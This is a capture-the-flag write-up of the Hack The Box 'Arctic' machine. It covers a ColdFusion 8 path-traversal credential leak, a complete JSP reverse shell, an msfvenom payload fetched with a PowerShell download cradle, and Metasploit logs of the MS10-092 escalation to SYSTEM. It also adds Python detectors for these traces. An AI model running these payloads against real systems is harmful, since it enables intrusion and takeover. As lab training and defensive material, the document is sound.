Initial Enumeration
So a Windows box with 3 ports open.
Port 135: RPC
There is a known RPC vulnerability on port 135 for XP boxes and MSF has an exploit for it, but it didn’t work here. Worth a shot, but not this time.
I suspect that port 49154 is the higher port associated with the RPC service.
Port 8500: fmtp?
Google seems to think this is Flight Message Transfer Protocol. I tried connecting via netcat but didn’t get much. Curl produced a result though:
So an HTTP service. Let’s see what it looks like in a browser:
I recognise those directory names from ColdFusion penetration tests I’ve done before. The first thing is to work out which version we’re dealing with. Poking about I find:
And 2 login pages:
There is a rather good page on ColdFusion hacking here: https://nets.ec/Coldfusion_hacking
It contains a Local File Disclosure exploit: https://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en which produces a result:
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
Just googling that hash gives the cracked value “happyday”, but the guide also mentions that you can pass the hash itself to the login form with a specially crafted request, which I’ll try later. For the time being, I’m into the administrator console:
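From the defender’s side, the traversal request above is easy to spot in web server logs once the query string is percent-decoded. The following is an added example (not code from the original post): it parses constructed combined-format access-log lines, decodes each query parameter until stable so that double-encoded variants are caught as well, and flags any parameter carrying a `../` or `..\` sequence or a `%00` null byte, recording the path the server would actually open if it truncated at the null byte. The log lines and IP addresses are constructed sample data.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines in combined log format (sample data, not from the post);
# the first request mirrors the enter.cfm locale traversal, the last is a double-encoded variant.
SAMPLE_LOG = """\
10.10.14.19 - - [13/Sep/2018:15:40:01 -0400] "GET /CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en HTTP/1.1" 200 183
10.10.10.5 - - [13/Sep/2018:15:40:05 -0400] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 4521
10.10.10.7 - - [13/Sep/2018:15:41:10 -0400] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 302 0
10.10.10.9 - - [13/Sep/2018:15:42:00 -0400] "GET /CFIDE/administrator/enter.cfm?locale=%252e%252e%252f%252e%252e%252fColdFusion8%252flib%252fpassword.properties%2500en HTTP/1.1" 200 183
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')  # "../" or "..\" once fully decoded


def fully_decode(value):
    """Percent-decode until stable so double-encoded sequences (%252e -> %2e -> .) are caught."""
    prev = None
    while value != prev:
        prev, value = value, unquote(value)
    return value


def find_traversal(log_text):
    """Return one finding per query parameter carrying a traversal sequence or a null byte."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for pair in urlsplit(m['target']).query.split('&'):
            name, _, raw = pair.partition('=')
            value = fully_decode(raw)
            traversal = TRAVERSAL_RE.search(value) is not None
            null_byte = '\x00' in value
            if traversal or null_byte:
                findings.append({
                    'ip': m['ip'], 'status': int(m['status']), 'param': name,
                    'traversal': traversal, 'null_byte': null_byte,
                    # the path a null-byte-truncating file open would actually use
                    'effective_path': value.split('\x00', 1)[0],
                })
    return findings


if __name__ == '__main__':
    for finding in find_traversal(SAMPLE_LOG):
        print(finding)
```

A 200 status on such a request is the signal that the disclosure actually succeeded, which is why the status is kept in each finding.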
I’ve hacked ColdFusion before so I know the rough plan. You can browse the host OS with the Code Analyser and use the Scheduler to fetch a web shell from a remote site you control. Shells can be CFM or JSP.
I created a JSP shell with the following code:
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
  // Copies one stream into another until it closes; two of these wire the socket to the process.
  class StreamConnector extends Thread {
    InputStream bp;
    OutputStream cu;

    StreamConnector( InputStream bp, OutputStream cu ) {
      this.bp = bp;
      this.cu = cu;
    }

    public void run() {
      BufferedReader gq = null;
      BufferedWriter hck = null;
      try {
        gq = new BufferedReader( new InputStreamReader( this.bp ) );
        hck = new BufferedWriter( new OutputStreamWriter( this.cu ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = gq.read( buffer, 0, buffer.length ) ) > 0 ) {
          hck.write( buffer, 0, length );
          hck.flush();
        }
      } catch( Exception e ){}
      try {
        if( gq != null ) gq.close();
        if( hck != null ) hck.close();
      } catch( Exception e ){}
    }
  }

  try {
    String ShellPath;
    if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
      ShellPath = new String("/bin/sh");
    } else {
      ShellPath = new String("cmd.exe");
    }
    Socket socket = new Socket( "10.10.14.19", 8888 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>
Then set up a netcat listener on the relevant port, browse to the shell.jsp file in the CFIDE web directory with Firefox or curl to get the code executed, and we have a shell:
So we’re dealing with a 2008 R2 Server.
Just as an aside: Kali has a ColdFusion shell called cfexec.cfm. If you upload that and trigger it you get the following:
It provides a web interface for commands. Note that the on-screen instructions are wrong – at least they always have been when I’ve tried them. The above is what works: the path to cmd.exe in the Command field, then /c followed by the command in Options. I mention this because I’ve done this before and thought the shell didn’t work, when it was just this hiccup.
Privilege Escalation
Privesc is likely to be easier if we get a meterpreter shell. I had a little difficulty with this initially. I tried to create an x64 payload and it just never connected back, so after multiple tries I ended up using a standard Windows reverse TCP meterpreter payload and then migrating.
Get A Meterpreter Shell
First create the payload using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.19 lport=7777 -f exe > meter_shell.exe
Then upload it onto the Windows box. We can do this several ways. We could use the ColdFusion Scheduler to get it on, but it’s a bit more elegant to do it from Windows directly. Windows doesn’t have loads of tools like wget, nc etc. built in, but it does have PowerShell. So set up the usual python -m SimpleHTTPServer in the same directory where we created the meter_shell.exe payload (note that it serves plain HTTP, on port 8000 by default, so the URL in the download command must use the scheme and port the server is actually listening on) and, for this version of Windows, a simple PS command is:
powershell "(new-object System.Net.WebClient).Downloadfile('https://10.10.14.19/meter_shell.exe', 'meter_shell.exe')"
Now set up the handler in Metasploit:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(multi/handler) > set lhost 10.10.14.19
lhost => 10.10.14.19
msf exploit(multi/handler) > set lport 7777
lport => 7777
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.19      yes       The listen address
   LPORT     7777             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.19:7777
[*] Sending stage (179779 bytes) to 10.10.10.11
[*] Meterpreter session 1 opened (10.10.14.19:7777 -> 10.10.10.11:56201) at 2018-09-13 15:51:01 -0400

meterpreter > getuid
Server username: ARCTIC\tolis
We can get the user.txt at this point but we want root of course.
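Both the JSP shell above (a cmd.exe spawned by the ColdFusion JRun process) and the PowerShell download cradle leave a distinctive process-creation trail on the host. The following is an added example (not code from the original post) that triages constructed Sysmon-style process-creation events: it flags a shell whose parent is the JRun process and any command line containing a WebClient DownloadFile cradle. The field names (ParentImage, Image, CommandLine, User) follow Sysmon event 1 and the events themselves are constructed sample data.

```python
import re

# Constructed process-creation events (Sysmon event 1 style fields); sample data, not from the post.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\ColdFusion8\runtime\bin\jrunsvc.exe", "Image": r"C:\ColdFusion8\runtime\bin\jrun.exe",
     "CommandLine": "jrun.exe -start coldfusion", "User": r"ARCTIC\tolis"},
    # what the JSP shell's Runtime.exec("cmd.exe") looks like from the host side
    {"ParentImage": r"C:\ColdFusion8\runtime\bin\jrun.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe", "User": r"ARCTIC\tolis"},
    # the WebClient download cradle typed into that shell
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell \"(new-object System.Net.WebClient).Downloadfile('https://10.10.14.19/meter_shell.exe', 'meter_shell.exe')\"",
     "User": r"ARCTIC\tolis"},
    # benign interactive activity that must not be flagged
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "User": r"ARCTIC\tolis"},
]

WEB_CONTAINERS = {"jrun.exe", "jrunsvc.exe"}   # ColdFusion 8 runs inside the JRun container
SHELLS = {"cmd.exe", "powershell.exe"}
CRADLE_RE = re.compile(r"net\.webclient.*downloadfile", re.I)


def basename(path):
    """Lower-cased file name of a Windows path (forward or back slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return one finding per event that is a shell spawned by JRun or a WebClient download cradle."""
    findings = []
    for ev in events:
        parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
        reasons = []
        if parent in WEB_CONTAINERS and child in SHELLS:
            reasons.append("shell spawned by ColdFusion/JRun process")
        if CRADLE_RE.search(ev["CommandLine"]):
            reasons.append("WebClient download cradle")
        if reasons:
            findings.append({"user": ev["User"], "parent": parent, "image": child, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The account in the findings is the one ColdFusion runs as (here tolis, as the getuid output above shows), which is what makes a web-container-to-shell lineage stand out from normal administrator activity.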
Migrate to the right architecture
Any exploit we want to use is likely to work better if we migrate to the 64-bit architecture first. Meterpreter does this by migrating into a named process. I don’t claim to understand the details! We need to find a 64-bit process running on Windows:
We know the Coldfusion ones are going to be running so we can use the jrunsvc.exe (note it’s x64) but others would be fine too. The migration module is not an in-session one so we need to background our current meterpreter session, set up the details, run it and then return to the session which is now hosted on the process we migrated to:
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use post/windows/manage/archmigration
[-] Failed to load module: post/windows/manage/archmigration
msf exploit(multi/handler) > use post/windows/manage/archmigrate
msf post(windows/manage/archmigrate) > show options

Module options (post/windows/manage/archmigrate):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   EXE            C:\windows\sysnative\svchost.exe  yes       The executable to start and migrate into
   FALLBACK       true                              yes       If the selected migration executable does not exist fallback to a sysnative file
   IGNORE_SYSTEM  false                             yes       Migrate even if you have SYSTEM privileges
   SESSION                                          yes       The session to run this module on.

msf post(windows/manage/archmigrate) > set exe C:\ColdFusion8\runtime\bin\jrun.exe
exe => C:ColdFusion8runtimebinjrun.exe
msf post(windows/manage/archmigrate) > set session 1
session => 1
msf post(windows/manage/archmigrate) > run

[*] You're not running as SYSTEM. Moving on...
[*] The meterpreter is not the same architecture as the OS! Upgrading!
[-] The selected executable to migrate into does not exist
[*] Starting new x64 process C:\windows\sysnative\svchost.exe
[+] Got pid 3168
[*] Migrating..
[+] Success!
[*] Post module execution completed
msf post(windows/manage/archmigrate) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information            Connection
  --  ----  ----                     -----------            ----------
  1         meterpreter x64/windows  ARCTIC\tolis @ ARCTIC  10.10.14.19:7777 -> 10.10.10.11:56201 (10.10.10.11)

msf post(windows/manage/archmigrate) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: c:\temp
Note sessions -l lists the sessions in play and sessions -i selects the session with which to interact.
Find vulnerabilities
Now we’re set up nicely we can use the built-in tools to help us find an exploit:
meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true

[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 15 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
    This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
    This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl. This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.
The suggester finds 2 possible exploits. Let’s try MS10-092 “schelevator” first.
Again this needs backgrounding to work:
meterpreter > background
[*] Backgrounding session 1...
msf post(windows/manage/archmigrate) > use exploit/windows/local/ms10_092_schelevator
msf exploit(windows/local/ms10_092_schelevator) > show options

Module options (exploit/windows/local/ms10_092_schelevator):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        no        Command to execute instead of a payload
   SESSION                    yes       The session to run this module on.
   TASKNAME                   no        A name for the created task (default random)

Exploit target:

   Id  Name
   --  ----
   0   Windows Vista, 7, and 2008

msf exploit(windows/local/ms10_092_schelevator) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information            Connection
  --  ----  ----                     -----------            ----------
  1         meterpreter x64/windows  ARCTIC\tolis @ ARCTIC  10.10.14.19:7777 -> 10.10.10.11:56201 (10.10.10.11)

msf exploit(windows/local/ms10_092_schelevator) > set session 1
msf exploit(windows/local/ms10_092_schelevator) > show options

Module options (exploit/windows/local/ms10_092_schelevator):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        no        Command to execute instead of a payload
   SESSION   1                yes       The session to run this module on.
   TASKNAME                   no        A name for the created task (default random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.19      yes       The listen address
   LPORT     6543             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Vista, 7, and 2008

msf exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 10.10.14.19:6543
[*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\DTjZFIQqTkxz.exe
[*] Creating task: KQnOyIo72aISU4
[*] SUCCESS: The scheduled task "KQnOyIo72aISU4" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\KQnOyIo72aISU4...
[*] Original CRC32: 0xdc89715a
[*] Final CRC32: 0xdc89715a
[*] Writing our modified content back...
[*] Validating task: KQnOyIo72aISU4
[*]
[*] Folder: \
[*] TaskName                                 Next Run Time          Status
[*] ======================================== ====================== ===============
[*] KQnOyIo72aISU4                           1/10/2018 7:10:00 ��   Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "KQnOyIo72aISU4" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "KQnOyIo72aISU4" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (179779 bytes) to 10.10.10.11
[*] SUCCESS: Attempted to run the scheduled task "KQnOyIo72aISU4".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (10.10.14.19:6543 -> 10.10.10.11:56299) at 2018-09-13 16:15:09 -0400
[*] SUCCESS: The scheduled task "KQnOyIo72aISU4" was successfully deleted.
[*] SCHELEVATOR

meterpreter > cd c:/users
meterpreter > ls
Listing: c:\users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2017-03-22 14:10:31 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 01:06:44 -0400  All Users
40555/r-xr-xr-x   0     dir   2009-07-14 02:38:22 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 01:06:44 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-14 00:57:55 -0400  Public
100666/rw-rw-rw-  174   fil   2009-07-14 00:57:55 -0400  desktop.ini
40777/rwxrwxrwx   8192  dir   2017-03-22 15:00:06 -0400  tolis
We’re now SYSTEM and can capture the root flag.
Hi Neil, good blog.
Thanks Jack!
Hi neilsec!
How can I get the waldo password to learn from your experience?
Hi Florens
Not sure that’s something for a public post – HTB don’t want the box walkthroughs public until the machines are retired. To be honest, there are so many clues on the HTB forums now that it’s pretty much out there anyway.
But if you have a more specific question, I’ll be happy to help. PM me at the HTB forum – same username.